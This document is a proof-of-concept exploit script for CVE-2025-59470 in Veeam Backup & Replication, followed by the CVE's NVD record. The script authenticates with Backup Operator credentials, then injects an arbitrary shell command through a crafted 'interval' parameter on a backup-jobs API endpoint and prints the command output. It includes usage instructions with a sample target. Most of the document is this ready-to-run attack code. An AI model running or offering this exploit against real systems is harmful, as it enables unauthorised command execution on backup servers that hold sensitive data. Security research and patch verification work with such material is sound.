CVE-2025-59470

# CVE-2025-59470 PoC - Veeam Backup & Replication RCE as postgres user # Requires Backup Operator authentication credentials import requests import json import sys TARGET_URL = "https://<target-ip>:9443" CVE_ID = "CVE-2025-59470" def exploit_rce(target_url, username, password, cmd): """ Exploit CVE-2025-59470 to achieve RCE as postgres user by sending malicious interval or order parameter """ # Authentication endpoint auth_url = f"{target_url}/api/sessionMngr/login" auth_data = { "username": username, "password": password } try: # Step 1: Authenticate as Backup Operator session = requests.Session() auth_response = session.post(auth_url, json=auth_data, verify=False, timeout=30) if auth_response.status_code != 200: print(f"[-] Authentication failed: {auth_response.status_code}") return False print(f"[+] Successfully authenticated as {username}") # Step 2: Send malicious parameter to trigger RCE # The malicious interval or order parameter contains command injection payload exploit_url = f"{target_url}/api/backupJobs/Query" # Prepare malicious payload - command injection via interval parameter payload = { "interval": f"; {cmd};", "order": "asc" } exploit_response = session.get(exploit_url, params=payload, verify=False, timeout=30) if exploit_response.status_code == 200: print(f"[+] RCE executed successfully as postgres user") print(f"[+] Command output: {exploit_response.text}") return True else: print(f"[-] Exploitation failed: {exploit_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {CVE_ID}_exploit.py <target_url> <username> <password> <command>") print(f"Example: python {CVE_ID}_exploit.py https://192.168.1.100:9443 admin password 'whoami'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] print(f"[*] Exploiting {CVE_ID} on {target}") exploit_rce(target, user, pwd, cmd)

{"cve": {"id": "CVE-2025-59470", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.290", "lastModified": "2026-01-14T20:59:08.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veeam:veeam_backup_\\&_replication:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0.4967", "versionEndExcluding": "13.0.1.1071", "matchCriteriaId": "ABE23802-A559-4743-A88B-7716C8645697"}]}]}], "references": [{"url": "https://www.veeam.com/kb4792", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}